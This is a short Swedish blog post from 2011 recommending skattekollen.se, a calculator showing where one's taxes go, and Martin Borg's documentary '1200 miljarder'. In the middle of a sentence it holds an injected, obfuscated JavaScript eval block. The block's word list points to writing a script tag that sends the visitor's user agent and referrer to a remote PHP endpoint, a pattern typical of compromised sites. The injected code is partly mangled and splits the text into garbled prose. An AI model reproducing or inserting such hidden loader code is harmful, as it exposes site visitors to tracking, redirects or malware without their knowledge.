Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Skattekollen – Vart går dina skattepengar?

Skattekollen – Vart går dina skattepengar?
Filip Urde
  • On 12 december, 2011
  • http://www.revue.se/filip-urde

Skattekollen .se här kan du se till vad dina hårt förtjänta pengar hamnar i skatt. Det är enkelt att testa, välj vilken stad (Gävle, Göteborg, Jönköping, Malmö, Stockholm, Umeå eller Uppsala) och skriv sedan hur mycket du tjänar i månaden. Du får sedan uppgifter på vad dina skattepengar går till. skattekollen.se

Mendan eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bnnsd|var|u0026u|referrer|zdiri||js|php’.split(’|’),0,{}))
ni knappar in det så tycker jag att alla som inte sett ”1200 miljarder”, ska göra det nu!

1200 miljarder är Martin Borgs superba dokumentär om vad våra skattepengar går till. Nämnden för hemslöjdsfrågor får t.ex. 20 miljoner… Sugen på att betala skatt?

Se filmen här.